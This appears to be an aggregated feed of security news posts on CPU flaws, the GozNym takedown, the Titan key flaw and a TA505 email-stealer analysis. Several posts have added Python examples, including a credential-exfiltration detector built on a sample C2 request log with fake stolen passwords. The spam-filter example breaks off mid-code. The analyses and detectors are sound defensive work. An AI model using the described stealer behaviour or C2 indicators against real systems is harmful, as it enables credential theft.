  • Track success. Make security a KPI so your organization can evaluate the ROI of the program.
  • Provide training. Volunteers can bring passion, but it’s up to your security experts to provide the knowledge your security champions will need to review code for flaws and pass best practices on to the development team.
  • Build community. Make sure security champions have ample opportunity to meet with each other and the security team to discuss specific issues and overall trends.

Cloud-based solution

In addition, a cloud-based application security solution can help you scale your program without a lot of extra cost or hassle compared to an on-premises solution. When an on-premises application security program needs to be scaled, enterprises frequently need to track down more hard-to-find security specialists, in addition to installing more servers.

Things that usually cost extra in an on-premises solution — features such as integrations, onboarding, upgrades, and maintenance — are all included with a cloud-based solution. This allows your security team to focus on scaling your AppSec efforts without worrying about going over budget.

Learn more

Application security is about more than scanning; the ability to scale your program is a critical factor that can make or break your program. Learn more about AppSec best practices in our new eBook, Application Security: Beyond Scanning.

Fallout from a Fallout

Often a data breach reveals other issues that a business is experiencing, but it isn’t every day that I see the opposite. When I heard about what was happening at Bethesda Softworks and their online game, I was interested immediately. The background on this is simple enough. Bethesda is a well-known video game […]

The post Fallout from a Fallout appeared first on Privacy Ref Blog.

Why You Should Pick a Leader for Your Enterprise Email Security

Email is a mature technology, but threats targeting email are evolving and getting more sophisticated. 97%[1] of ransomware attacks come from email. That’s why there are so many email security vendors and solutions in the market offering different types of technologies and coverages. Picking the best email security solution for an organization can be overwhelming.

Maybe it doesn’t have to be. Forrester Research, a well-known independent research firm, released “The Forrester Wave™: Enterprise Email Security, Q2 2019” report on May 16, 2019. Using its 32-criterion evaluation of enterprise email content security providers, Forrester identified the 12 most significant vendors and researched, analyzed, and scored them. This report shows how each provider measures up and helps security and risk professionals select the right one for their needs.

Trend Micro has been named a Leader in the Forrester report. What’s special is that we also received the highest score in the Strategy category among all 12 vendors. Furthermore, we got the highest score possible for the “Technology leadership” criterion, which is a sub-criterion of the Product Strategy criterion. Trend Micro also received the highest score possible in the “Deployment options” and “Cloud integration” criteria.

Highest score possible for “Technology leadership” criterion in Strategy category – our takeaways

Building on 20+ years in email security, Trend Micro continues to make strong investments and technology innovations in this market. Email threats are evolving, and so are Trend Micro’s email security solutions. To cite just a couple of examples, new technologies developed by Trend Micro to combat the latest email threats include:

  • The unique, patent-pending Writing Style DNA technology compares the writing style of suspected fraud emails to the known AI model of the executive being impersonated. This technology adds another layer of filtering for Business Email Compromise (BEC) attacks on top of the machine learning-based email header and content analysis. To date, Trend Micro has built AI writing style models for almost 7,000 high-profile users, and found 5,400 additional attacks at 160 organizations. This is the final detection layer after Microsoft Office 365 and/or email gateway filtering and other Trend Micro anti-phishing filters.
  • Computer vision detection of popular fake login sites for account takeover protection. This patent-pending technology blends computer vision image analysis with artificial intelligence to “see” fake websites, protecting customers from credential phishing attacks.

With a long and innovative history with email security, Trend Micro remains at the forefront of the industry with a strong strategy that continues to position its customers well over the long term.

Highest score possible in “Deployment options” and “Cloud integration” criteria – our takeaways

Trend Micro is the only vendor to offer dual-layer email protection via a cloud-based API solution plus an SMTP gateway for advanced threat protection, giving customers the benefits of both deployment types. The email gateway (SMTP) suits inbound filtering and outbound DLP or email encryption. The API solution is quick to deploy and can protect against internal phishing emails in Office 365 or Gmail, as well as in cloud file-sharing services (e.g. OneDrive or Google Drive).

Trend Micro email security has a proven track record: in 2018, Trend Micro Cloud App Security, the API solution, stopped 8.9 million high-risk threats that weren’t caught by Office 365 security.

By choosing Trend Micro, you are investing in a solution which will continuously evolve to combat tomorrow’s email security challenges.

Check out the report and see for yourself why Trend Micro is a leader in Enterprise Email Security.

[1] TrendLabs 2017 Security Roundup, March 2018


Another Intel Chip Flaw

Remember the Spectre and Meltdown attacks from last year? They were a new class of attacks against complex CPUs, finding subliminal channels in optimization techniques that allow hackers to steal information. Since their discovery, researchers have found additional similar vulnerabilities.

A whole bunch more have just been discovered.

I don't think we're finished yet. A year and a half ago I wrote: "But more are coming, and they'll be worse. 2018 will be the year of microprocessor vulnerabilities, and it's going to be a wild ride." I think more are still coming.

Best 5 Nintendo 3DS Emulator for Android, iOS & PC

The Nintendo 3DS was introduced on February 26, 2011, in Japan and then worldwide. Less than six months later, Nintendo announced a significant price drop. Nintendo had been experimenting with stereoscopic 3D video games since the 1980s.

Nintendo did not taste great success with 3D initially, but it kept innovating, and in 2010 it announced the first console in the Nintendo DS family with official 3D support, which went on to achieve great success.

Today we’ll look at a few of the best 3DS emulators for Android and PC that let you play Nintendo games on your phone or PC without changing any settings. If you want a Nintendo Switch emulator, that is also available.

Best 3DS Nintendo Emulators for Android, PC, and iOS

1. nds4droid

nds4droid is a free Nintendo DS emulator. It is still in its infancy, but supports many features you’d expect like save states and sound. It also supports the OUYA game console.

One of the best things about nds4droid is that the application is open source, so anyone can download it without paying anything and even modify its code. Loading ROMs works exactly as it does with any other emulator.

nds4droid supports many video games, but it has its limitations. Some work perfectly, while others have problems with the emulator. Final Fantasy IV, for example, works well, but at a frame rate that is less than desirable.

Nds4droid is a powerful emulator for the Nintendo DS. It does not yet support the full catalog of Nintendo DS games, but you can still play excellent titles.

2. Drastic 3ds Emulator for Android

It is one of the fastest Android emulators and plays Nintendo games at full speed. The emulator can render 3D graphics at twice the native resolution, giving a smooth gaming experience, and it runs most popular games with ease. It has many features, among them screen layout customization, Google Drive support, fast forwarding, controller customization, and support for both software and hardware controllers.

3. Citra 3Ds Emulator For Windows

Citra is a work-in-progress 3DS emulator. It can currently emulate, with varying degrees of success, a wide variety of homebrew programs and commercial software. It runs on Windows, Mac OS X, and Linux; the developers work constantly on stability issues, and it offers more features than other emulators on the market.

4. NeonDS (for Windows)

NeonDS (for Windows) is a Nintendo DS emulator that lets you play old commercial DS games on a Windows computer. The mouse mimics the stylus of the Nintendo DS handheld. The Nintendo DS was the first portable console with two screens, one of them a touch screen. NeonDS emulates the Nintendo DS so you can play DS games on your computer.

5. 3DS emulator app for iOS

The 3DS Emulator can be installed on iOS 11, iOS 11.12 or iOS 11.2 without jailbreaking; the app claims to give access to paid Nintendo games for free. The Nintendo 3DS emulator for Apple’s operating system lets users create an environment similar to the 3DS console on their iOS device. It aims to behave as if you were using a 3DS console, so users get the same experience they would on the real hardware.


Related Resource: 

Gamers Be Warned, Never Download ‘Free AAA’ Games In Peer-To-Peer Networks

4 Things Gamers Should Never Forget Even If It Is The Holiday Season


A joint operation by international police dismantled GozNym gang

A joint effort by international law enforcement agencies from 6 different countries has dismantled the crime gang behind the GozNym banking malware.

GozNym banking malware is considered one of the most dangerous threats to the banking industry; experts estimate it was used over the years to steal nearly $100 million from more than 41,000 victims across the globe.

“An unprecedented, international law enforcement operation has dismantled a complex, globally operating and organised cybercrime network.” reads the press release published by the Europol. “The criminal network used GozNym malware in an attempt to steal an estimated $100 million from more than 41 000 victims, primarily businesses and their financial institutions.”


The GozNym banking malware was first spotted in April 2015 by researchers from the  IBM X-Force Research, it combines the best features of Gozi ISFB and Nymaim malware.

GozNym has been seen targeting banking institutions, credit unions, and retail banks. Its victims include 24 financial institutions in North America and organizations in Europe, among them Polish webmail service providers, investment banking and consumer accounts at 17 banks in Poland, and one bank in Portugal.

Now Europol has announced the unprecedented international law enforcement operation that dismantled this complex, globally operating and organised cybercrime network.

Europol, with the help of law enforcement agencies from Bulgaria, Germany, Georgia, Moldova, Ukraine, and the United States, identified 10 individuals alleged to be members of the GozNym network.

Five defendants were arrested during coordinated searches conducted in Bulgaria, Georgia, Moldova, and Ukraine; the remaining ones are Russian citizens and are still on the run, including the expert who developed the banking malware.

The cybercrime organization has been described by the Europol as a highly specialised and international criminal network.

One of the members, who encrypted the GozNym malware to evade detection by security solutions, was arrested and is being prosecuted in the Republic of Moldova.

Operators behind the GozNym malware used the Avalanche network to spread the malware.

“Bulletproof hosting services were provided to the GozNym criminal network by an administrator of the “Avalanche” network. The Avalanche network provided services to more than 200 cybercriminals, and hosted more than twenty different malware campaigns, including GozNym.” continues the press release published by Europol. “Through the coordinated efforts being announced today, this alleged cybercriminal is now facing prosecution in Ukraine for his role in providing bulletproof hosting services to the GozNym criminal network. The prosecution will be conducted by the Prosecutor General’s Office of Ukraine and the National Police of Ukraine.”

The members of the gang used banking malware to infect victims’ computers and steal their online banking credentials.

“A criminal Indictment returned by a federal grand jury in Pittsburgh, USA charges ten members of the GozNym criminal network with conspiracy to commit the following:

  • infecting victims’ computers with GozNym malware designed to capture victims’ online banking login credentials;
  • using the captured login credentials to fraudulently gain unauthorised access to victims’ online bank accounts;
  • stealing money from victims’ bank accounts and laundering those funds using U.S. and foreign beneficiary bank accounts controlled by the defendants.”

The defendants are well known in the Russian underground, where they advertised their specialized technical skills and services on Russian-speaking criminal forums. It was through these forums that the leader of the GozNym network recruited them.

“The leader of the GozNym criminal network, along with his technical assistant, are being prosecuted in Georgia by the Prosecutor’s Office of Georgia and the Ministry of Internal Affairs of Georgia.” continues the Europol.

Below the advisory published by the FBI:


Pierluigi Paganini

(SecurityAffairs – GozNym, malware)

The post A joint operation by international police dismantled GozNym gang appeared first on Security Affairs.

Cisco Service Provider, WebEx Bugs Offer Up Remote Code Execution

The vendor also issued a patch schedule for the still-unpatched bug in its Secure Boot trusted hardware environment, which affects most of its enterprise and SMB portfolio, amounting to millions of vulnerable devices.

Forbes subscribers warned of Magecart threat skimming credit card details

The notorious Magecart malware, that blights online stores by stealing payment card details from unsuspecting shoppers at checkout, has claimed another high profile victim. Security researcher Troy Mursch raised the alarm on Twitter that the Forbes magazine subscription website had been compromised with malicious code that was siphoning off sensitive credit card information as users […]

The post Forbes subscribers warned of Magecart threat skimming credit card details appeared first on The State of Security.

Microsoft renewed its Attack Surface Analyzer, version 2.0 is online

Microsoft has renewed its Attack Surface Analyzer tool to take advantage of modern, cross-platform technologies.

The first version, Attack Surface Analyzer 1.0, was released back in 2012; it detects the changes that third-party application installers make to a Windows system.

The new version has been released on GitHub and is built with .NET Core and Electron. Choosing these two cross-platform technologies lets it run on macOS and Linux as well as Windows.

“Attack Surface Analyzer is a Microsoft-developed open source security tool that analyzes the attack surface of a target system and reports on potential security vulnerabilities introduced during the installation of software or system misconfiguration.” reads the README file published by Microsoft.

“Attack Surface Analyzer 2.0 replaces the original Attack Surface Analyzer tool, released publicly in 2012.”

Attack Surface Analyzer

Users of Attack Surface Analyzer can determine the changes to the system attack surface introduced when software is installed and evaluate the risk presented by third-party software.

The tool is able to detect any changes to OS components, including file system (static snapshot and live monitoring available), user accounts, services, network ports, certificates, registry (Windows only).

“The core feature of Attack Surface Analyzer is the ability to “diff” an operating system’s security configuration, before and after a software component is installed.” continues Microsoft. “This is important because most installation processes require elevated privileges, and once granted, can lead to unintended system configuration changes.”

The tool reports on potential vulnerabilities introduced during app installation. 

“This tool can play an important role in ensuring that the software you develop or deploy doesn’t adversely affect the operating system security configuration by allowing you to scan for specific types of changes,” reads a blog post published by Microsoft. 

Microsoft pointed out that the tool offers both an Electron GUI and a command line interface. In command line mode the results are written to a local HTML or JSON file, an implementation choice that makes it easy to include the tool in an automated toolchain.
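The before/after “diff” Microsoft describes is the whole idea, so here it is as an added Python illustration. This is not Microsoft’s code (that is on GitHub); the two snapshots are constructed inline in the shape a collector might record, the “agentd” installer they describe is hypothetical, and the severity heuristics are this example’s own.

```python
"""Before/after attack-surface diff, in the spirit of Attack Surface Analyzer.

Added illustration, not Microsoft's tool: two host snapshots (constructed
inline, as a collector might record them) are compared and each delta is
rated so the reviewer sees which installer side effects matter most.
"""
import json
from dataclasses import dataclass, asdict
from typing import Any, Dict, List, Optional

Snapshot = Dict[str, Dict[str, Dict[str, Any]]]

# Constructed sample: host state before installing a hypothetical "agentd".
BEFORE: Snapshot = {
    "ports": {"tcp/22": {"bind": "0.0.0.0", "proc": "sshd"}},
    "services": {"sshd": {"user": "root", "start": "auto"}},
    "files": {"/etc/ssh/sshd_config": {"sha256": "aa11", "mode": "0644"}},
    "users": {"root": {"uid": 0}, "alice": {"uid": 1000}},
}

# Constructed sample: the same host after the installer ran with elevated rights.
AFTER: Snapshot = {
    "ports": {
        "tcp/22": {"bind": "0.0.0.0", "proc": "sshd"},
        "tcp/8080": {"bind": "0.0.0.0", "proc": "agentd"},
    },
    "services": {
        "sshd": {"user": "root", "start": "auto"},
        "agentd": {"user": "root", "start": "auto"},
    },
    "files": {
        "/etc/ssh/sshd_config": {"sha256": "bb22", "mode": "0644"},
        "/opt/agent/agent.conf": {"sha256": "cc33", "mode": "0666"},
    },
    "users": {"root": {"uid": 0}, "alice": {"uid": 1000}, "agentsvc": {"uid": 0}},
}

ANY_ADDR = {"0.0.0.0", "::"}
PRIV_USERS = {"root", "SYSTEM", "LocalSystem"}


@dataclass
class Finding:
    category: str
    key: str
    change: str                      # "added", "removed" or "changed"
    before: Optional[Dict[str, Any]]
    after: Optional[Dict[str, Any]]
    severity: str = "low"


def rate(f: Finding) -> str:
    """Heuristic severity: new exposure and privilege count for more than churn."""
    new = f.after or {}
    if f.change == "added":
        if f.category == "ports" and new.get("bind") in ANY_ADDR:
            return "high"            # new listener reachable from any interface
        if f.category == "services" and new.get("user") in PRIV_USERS:
            return "high"            # new service running with full privileges
        if f.category == "users" and new.get("uid") == 0:
            return "high"            # a second uid-0 account
    if f.category == "files" and new.get("mode", "")[-1:] in ("2", "3", "6", "7"):
        return "high"                # "others" have write access to the file
    if f.change == "changed":
        return "medium"              # pre-existing config or binary was altered
    return "low"


def diff_snapshots(before: Snapshot, after: Snapshot) -> List[Finding]:
    """Return every added, removed or changed item across all categories."""
    findings: List[Finding] = []
    for cat in sorted(set(before) | set(after)):
        b, a = before.get(cat, {}), after.get(cat, {})
        for key in sorted(set(b) | set(a)):
            if key not in b:
                f = Finding(cat, key, "added", None, a[key])
            elif key not in a:
                f = Finding(cat, key, "removed", b[key], None)
            elif a[key] != b[key]:
                f = Finding(cat, key, "changed", b[key], a[key])
            else:
                continue             # unchanged: not part of the diff
            f.severity = rate(f)
            findings.append(f)
    return findings


def summarize(findings: List[Finding]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.severity] = counts.get(f.severity, 0) + 1
    return counts


def report(findings: List[Finding]) -> str:
    """JSON output, the shape that is easiest to gate a build pipeline on."""
    return json.dumps([asdict(f) for f in findings], indent=2)


if __name__ == "__main__":
    fs = diff_snapshots(BEFORE, AFTER)
    print(report(fs))
    print(summarize(fs))
```

On the constructed input the installer leaves four high findings (a new 0.0.0.0 listener, a new root service, a world-writable config file and a second uid-0 account) and one medium one (sshd_config was modified), which is exactly the kind of side effect an elevated installer can introduce without telling anyone.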

Pierluigi Paganini

(SecurityAffairs – Attack Surface Analyzer, Microsoft)

The post Microsoft renewed its Attack Surface Analyzer, version 2.0 is online appeared first on Security Affairs.

Episode 494 – Why Forcing Password Resets Makes You Less Secure

This episode is a continuation on the death of the password. I talk about how forcing resets actually can make you less secure and what the future may bring for authentication for everyone. Be aware, be safe. *** Support the podcast with a cup of coffee *** – Ko-Fi Security In Five Don’t forget to […]

The post Episode 494 – Why Forcing Password Resets Makes You Less Secure appeared first on Security In Five.

A flaw in Google Titan Security Keys exposes users to Bluetooth attacks

Titan Security Keys are affected by a severe vulnerability, and for this reason Google is offering a free replacement for the vulnerable devices.

Google announced it is offering a free replacement for Titan Security Keys affected by a serious vulnerability that could be exploited to carry out Bluetooth attacks.

Titan Security Keys

The Titan Security Keys were introduced by Google in July 2018 to give its users an additional layer of security and protect them from phishing and MitM attacks.

The Titan Security Key implements the FIDO (Fast IDentity Online) Alliance U2F (Universal 2nd Factor) protocol and was designed entirely by Google.

The Titan Security Keys are available in both USB and Bluetooth versions.

The vulnerability affects the Bluetooth Low Energy (BLE) version of the T1 and T2 Titan Security Keys; the USB and NFC keys are not impacted.

Google users can refer to a page set up by the company to find out whether their devices are affected and to get instructions for replacing them.

The vulnerability, discovered by Microsoft, is a misconfiguration in the Titan keys’ Bluetooth pairing protocols. Google explained that it is hard to exploit: an attacker physically close to the victim can trigger it only under specific conditions.

The attacker has to connect their own device to the victim’s security key before the legitimate device does, and has to do so at exactly the moment the victim presses the button on the dongle.

“Due to a misconfiguration in the Titan Security Keys’ Bluetooth pairing protocols, it is possible for an attacker who is physically close to you at the moment you use your security key — within approximately 30 feet — to (a) communicate with your security key, or (b) communicate with the device to which your key is paired.” reads the advisory published by Google.

Below are the conditions the attacker would have to meet to carry out the attack:

  • When you’re trying to sign into an account on your device, you are normally asked to press the button on your BLE security key to activate it. An attacker in close physical proximity at that moment in time can potentially connect their own device to your affected security key before your own device connects. In this set of circumstances, the attacker could sign into your account using their own device if the attacker somehow already obtained your username and password and could time these events exactly.
  • Before you can use your security key, it must be paired to your device. Once paired, an attacker in close physical proximity to you could use their device to masquerade as your affected security key and connect to your device at the moment you are asked to press the button on your key. After that, they could attempt to change their device to appear as a Bluetooth keyboard or mouse and potentially take actions on your device.

In the second scenario, once the attacker’s device has connected to the victim’s device in place of the key at the moment the button is pressed, it can re-present itself as a Bluetooth mouse or keyboard and inject input into the victim’s device.

Even with this Bluetooth flaw, Google stresses that security keys remain the strongest protection against phishing.

“Security keys remain the strongest available protection against phishing; it is still safer to use a key that has this issue, rather than turning off security key-based two-step verification (2SV) on your Google Account or downgrading to less phishing-resistant methods (e.g. SMS codes or prompts sent to your device),” continues Google.

Until they get a replacement, users have been advised to use their Bluetooth Titan Security Keys only in places where a potential attacker cannot be within physical proximity.

Pierluigi Paganini

(SecurityAffairs – Titan Security Keys, hacking)

The post A flaw in Google Titan Security Keys expose users to Bluetooth Attacks appeared first on Security Affairs.

Intel MDS attack mitigation: An overview

Intel revealed on Tuesday that some of its CPUs are vulnerable to a number of new speculative execution attacks that may allow attackers to steal sensitive data and keys/passwords. The ZombieLoad, RIDL and Fallout attacks have been extensively written about by the research groups that found them, but many customers and enterprise users are still unclear on whether these could affect them and what they can do to protect themselves. […]

The post Intel MDS attack mitigation: An overview appeared first on Help Net Security.

The stealthy email stealer in the TA505 hacker group’s arsenal

Experts at Yoroi-Cybaze Z-Lab observed a spike in attacks against the banking sector and spotted a new email stealer used by the TA505 hacker group


During the last month, our Threat Intelligence surveillance team spotted increasing evidence of intensified operations against the banking sector. Several independent researchers pointed to a particular email attack wave probably related to the known TA505 hacking group, active since 2014 and focused on retail and banking companies. The group is also known for the evasive techniques it has adopted over time to bypass security controls and penetrate corporate perimeters with several kinds of malware, for instance abusing so-called LOLBins (Living Off The Land Binaries), legitimate programs regularly used by the victim, or abusing validly code-signed payloads.

Figure 1. Attack campaign spotted in the wild.

Investigating and tracking their operations during April and May, we detected an interesting tool delivered to the victim machine. Right after the malicious documents were opened and the FlawedAmmyy RAT implants installed, the group deployed a particular credential stealing program from its arsenal, revealing details of its recent operation.

Figure 2. Attack campaign spotted in the wild.

Technical Analysis

The piece of malware under analysis was downloaded from “bullettruth[.com/out[.exe” and executed on the victim machines after the infection was established.

Threat: Custom Email Stealer
Brief description: Executable of the email stealer

Figure 3: Malware signature by SLON LTD

First, we noticed that this secondary component was well positioned to evade antivirus detection: the PE file was signed in the first half of May with a certificate issued by Sectigo, a major commercial Certificate Authority. Analyzing the trust chain, we found the attackers were relying on a code-signing certificate issued to a UK company named SLON LTD. At this time we have no evidence to say whether that company is itself the victim of a previous compromise.

A static inspection of the binary revealed a quite high entropy level, suggesting it may be packed.

Figure 4: Malware suspicious entropy level

Executing the malware dynamically reveals more about its behaviour. The executable is essentially an email stealer: its only purpose is to harvest all the email accounts and passwords present on the victim machine. After running its information gathering routine, the malware sends all the retrieved emails and passwords to its C2:

Figure 5: HTTP POST communication

The notable thing about the communication with the C2 is that there is no encryption: the harvested data is sent to the C2 as plain JSON. Investigating the attacker’s infrastructure with our Digital Surveillance systems, we also recovered information about the stolen emails.
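A plaintext JSON POST full of addresses and passwords is a very detectable exfiltration pattern. The following is an added Python example, not Yoroi’s code and not part of the malware: it scores request records from a constructed log (a hypothetical JSON-lines export from an inline proxy that retains POST bodies). The host name is the IoC from the write-up; the “/collect” path, the client addresses and the allowlist of legitimate POST destinations are invented, and nothing here touches the network.

```python
"""Flag plaintext JSON credential dumps leaving the network.

Added example, not Yoroi's code or the malware's. RECORDS is a constructed
request log (hypothetical proxy export with POST bodies retained); the
destination host is the IoC from the write-up, the path is invented, and
no network access happens.
"""
import json
import re
from typing import Any, Dict, Iterator, List, Tuple

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
PASSWORD_KEYS = {"password", "pass", "pwd", "passwd"}
KNOWN_POST_HOSTS = {"outlook.office365.com", "mail.google.com"}  # constructed allowlist

RECORDS: List[Dict[str, Any]] = [
    {"ts": "2019-05-14T10:02:11Z", "src": "10.0.0.21", "scheme": "http",
     "host": "bullettruth.com", "method": "POST", "path": "/collect",
     "body": json.dumps({"machine": "WS-021", "accounts": [
         {"email": "j.doe@example.com", "password": "Spring2019!"},
         {"email": "cfo@example.com", "password": "hunter2"}]})},
    {"ts": "2019-05-14T10:02:40Z", "src": "10.0.0.21", "scheme": "https",
     "host": "outlook.office365.com", "method": "POST", "path": "/owa/service.svc",
     "body": json.dumps({"action": "GetFolder", "id": "inbox"})},
    {"ts": "2019-05-14T10:01:58Z", "src": "10.0.0.21", "scheme": "http",
     "host": "bullettruth.com", "method": "GET", "path": "/out.exe", "body": ""},
    {"ts": "2019-05-14T10:05:03Z", "src": "10.0.0.37", "scheme": "https",
     "host": "api.example-crm.com", "method": "POST", "path": "/v1/contacts",
     "body": json.dumps({"email": "sales@example.com", "name": "Sales"})},
]


def walk(obj: Any) -> Iterator[Tuple[str, str]]:
    """Yield ("key", name) for every dict key and ("str", value) for every string."""
    if isinstance(obj, dict):
        for k, v in obj.items():
            yield "key", str(k)
            yield from walk(v)
    elif isinstance(obj, list):
        for v in obj:
            yield from walk(v)
    elif isinstance(obj, str):
        yield "str", obj


def score_record(rec: Dict[str, Any]) -> Tuple[int, List[str]]:
    """Score one request; only JSON POST bodies are of interest to this rule."""
    reasons: List[str] = []
    if rec.get("method") != "POST":
        return 0, reasons
    try:
        body = json.loads(rec.get("body") or "")
    except ValueError:
        return 0, reasons            # not JSON: out of scope for this rule
    keys = {name.lower() for kind, name in walk(body) if kind == "key"}
    emails = [s for kind, s in walk(body) if kind == "str" and EMAIL_RE.fullmatch(s)]
    score = 0
    if keys & PASSWORD_KEYS:
        score += 3
        reasons.append("password-like field names in body")
    if len(emails) >= 2:
        score += 2
        reasons.append(f"{len(emails)} email addresses in body")
    if rec.get("scheme") == "http":
        score += 2
        reasons.append("plaintext HTTP")
    if rec.get("host") not in KNOWN_POST_HOSTS:
        score += 1
        reasons.append("destination not in POST allowlist")
    return score, reasons


def detect(records: List[Dict[str, Any]], threshold: int = 5) -> List[Dict[str, Any]]:
    """Return one alert per record whose score reaches the threshold."""
    alerts = []
    for rec in records:
        score, reasons = score_record(rec)
        if score >= threshold:
            alerts.append({"ts": rec["ts"], "src": rec["src"], "host": rec["host"],
                           "path": rec["path"], "score": score, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect(RECORDS):
        print(json.dumps(alert))
```

Only the constructed C2 POST scores above the threshold; the CRM request with a single address stays well below it, and the GET of the dropper is left to a separate download rule. The scoring is deliberately additive so that a TLS-wrapped variant of the same stealer would still be caught by the field names and address count alone.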

To retrieve more details about this email stealer, the analysis moved on to debugging and disassembling. As mentioned, the sample is heavily obfuscated and packed; however, by letting it run inside a debugger we were able to extract the unpacked payload.

Figure 6: Static information about the packed sample (on the left) and the unpacked one (on the right)

As the figure above shows, the two components differ in one notable way: the packed sample was compiled with Microsoft Visual C++ 6.0, while the unpacked one was compiled with Microsoft Visual C++ 8. At this point we deepened the analysis of the extracted payload. We were not able to execute it on its own, because it references many memory addresses of the original process, so we carried on with static analysis of the extracted sample.

As described earlier, the malware’s principal purpose is to iterate through the filesystem looking for email accounts. Its first step is to check whether the “outlook.exe” process is running and, if so, kill it: the malware walks the user processes with the Process32FirstW API and terminates the match with TerminateProcess.

Figure 7: Outlook process search routine

The extracted payload has no code obfuscation of any kind; the C2 server and the path are not even encoded:

Figure 8: C2 connection routine

The last routine analyzed is the credential harvesting across the entire filesystem.

Besides the routine that looks up the email accounts registered in the Outlook and Thunderbird clients (Figure 7), another routine scans the filesystem for a hardcoded list of extensions and, for each match, keeps a reference to the file in the %TEMP% directory. The gathered email accounts are then sent to the server, after which the malware removes its traces: it writes a simple batch script that deletes the executable and the other artifacts of the infection.

Figure 9: Autodeletion batch script

Analysis of Exposed Emails

This section presents some statistics on the emails harvested in the attack campaign, recovered during our surveillance and hunting operations. We sorted the stolen data by the most frequent TLD occurrences and plotted the result.

Figure 10: Distribution of TLD

As the graph shows, the most frequent TLD is .com with 193,194 occurrences, followed by .kr with 102,025, .cn with 26,160, .it with 6,317, and so on. To visualize the macro-locations involved in this exposure, we built a heatmap of the geographical distribution of the top 100 countries referenced by the TLDs.

Figure 11: Geolocation of emails TLD exposure

The heatmap shows the less affected countries in greenish tones and the most affected ones in orange or red. The first thing that emerges from these two distributions is that this specific threat does not seem to be targeted: the spread is almost global, with red or orange zones in the UK, Italy, the Republic of Korea, China, Germany, Hungary, Taiwan, Japan, India and Mexico. All of these countries exceed a thousand occurrences.


Email accounts are an effective source of revenue for cyber criminals: the stolen information can be used to spread other malware through phishing campaigns, to perform BEC (Business Email Compromise) attacks, and to attempt credential stuffing.

Even a simple info-stealer like this one can be a dangerous threat, especially when used by organized groups in conjunction with other malware implants. As also reported by the independent researcher Germán Fernández Bacian, this email stealer has recently been used by the infamous TA505 hacking group. That link means, with good confidence, that the exposed data, full email accounts in some cases and email contacts in general, is now in the hands of a cyber-criminal group that has launched targeted attacks against the banking and retail industries in the recent past.

Technical details, including IoCs and Yara Rules, are available in the analysis published on the Yoroi blog.


Pierluigi Paganini

(SecurityAffairs – TA505, malware)

The post The stealthy email stealer in the TA505 hacker group’s arsenal appeared first on Security Affairs.

Smashing Security #128: Shackled ankles, photo scrapes, and SIM card swaps

A bad software update causes big headaches for Dutch police, but brings temporary freedom to criminals. SIM swaps are in the news again as fraudsters steal millions. And does your cloud photo storage service have a dirty little secret?

All this and much much more is discussed in the latest edition of the “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Rip Off Britain’s David McClelland.

UK Fraud Complaints Surge Over 40%


UK consumers’ complaints over banking fraud have surged by over 40% to hit an all-time high in the 2018-19 financial year, driven by online scams, according to official figures.

The Financial Ombudsman Service (FOS), which settles disputes between customers and their banks, said it received 12,195 complaints over the period, a 43% increase on the 6,952 in the previous 12 months.

“One of the fastest-growing types of fraud is authorized push payment (APP) fraud — where people unwittingly act on fraudsters’ instructions and carry out the transactions themselves,” the FOS said.

“We’ve been taking a close look at the APP complaints we’ve received. And we’ve reminded banks of their existing obligations to ensure that victims of fraud are treated fairly, as we’ve found that they haven’t always got this right.”

A new voluntary code of practice will come into force at the end of May designed to help victims of APP fraud get their money back more easily. Up until now, banks have been reluctant to pay out in such cases and often blame the individual.

Some £354m was lost to APP fraud in the UK last year, up 50% from 2017. Although some lenders, like TSB, have sought to differentiate by promising to refund victims, the industry in general has been slow to react to the threat.

“Bank transfer fraud is spiraling out of control, with people losing life-changing sums every day and then facing a grueling battle to get their money back from the very banks that should be preventing them from falling victim in the first place,” argued Gareth Shaw, head of money at consumer rights group Which?.

“Banks have just two weeks to sign up to the new industry code [of practice], which will only be deemed a success if they finally halt this worsening crime by offering better protection to their customers, while swiftly and fairly reimbursing all those who lose money through no fault of their own.”

Another new proposal comes from the Payment Systems Regulator (PSR) and will introduce “confirmation of payee checks” to warn users when the name they enter into online bank transfers doesn’t match the sort code and account number on record.

However, a July 1, 2019 deadline is now set to be pushed back to 2020.

WhatsApp attacked by spyware | TECH(feed)

WhatsApp’s recent spyware hack took advantage of a security vulnerability and allowed attackers to access private, digital communication. In this episode of TECH(feed), Juliet walks through the hack, who was affected and how you can secure your devices ASAP.

The Six Most Effective Email Spam Blocker Tips

Email, as we know, is always susceptible to spam, and anyone who uses it has to deal with spam almost daily. Email clients today come with anti-spam filters that move spam into separate folders, but since such filters are not 100 percent effective, email users should know how to deal with spam themselves. Here are some of the most effective email spam blocker tips.

Begin by training your spam filter

As already stated, the spam filter your email client ships with is not perfect at detecting spam, so it is worth training it to do better. This is done in two ways. First, when spam sneaks past the filter and lands in your inbox, do not just delete it: select it and tell the client it is spam by clicking the “Report spam” button. Second, when a legitimate message lands in your spam folder, select it and tell the client it made a mistake by clicking the “Not spam” (or similar) button. Every such report is a new labelled sample, and that is what makes the filter perform better over time.
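To make concrete what those two buttons actually do to a filter, here is an added Python example (not the code of any real mail client): a small naive Bayes classifier trained on a constructed corpus. The scenario lets a BEC-style message slip past the filter, has the user report it, and shows that the next similar message is then caught, while a “Not spam” report on a false positive pushes that message back toward ham. The corpus, messages and thresholds are all invented for the illustration.

```python
"""Spam filter that learns from "Report spam" / "Not spam" clicks.

Added example, not any mail client's code. A naive Bayes classifier is
trained on a constructed corpus; scenario() shows a message slipping past
the filter, the user reporting it, and the next similar message being caught.
"""
import math
import re
from collections import Counter
from typing import Dict, Set

TOKEN_RE = re.compile(r"[a-z0-9$!']{2,}")


def tokens(text: str) -> Set[str]:
    """Lower-cased word set; each token counts once per message."""
    return set(TOKEN_RE.findall(text.lower()))


class BayesFilter:
    def __init__(self) -> None:
        self.spam: Counter = Counter()   # token -> number of spam messages containing it
        self.ham: Counter = Counter()    # token -> number of ham messages containing it
        self.n_spam = 0
        self.n_ham = 0

    def train(self, text: str, is_spam: bool) -> None:
        bucket = self.spam if is_spam else self.ham
        bucket.update(tokens(text))
        if is_spam:
            self.n_spam += 1
        else:
            self.n_ham += 1

    # The two buttons from the tip above are nothing more than extra training data.
    def report_spam(self, text: str) -> None:
        self.train(text, True)

    def report_not_spam(self, text: str) -> None:
        self.train(text, False)

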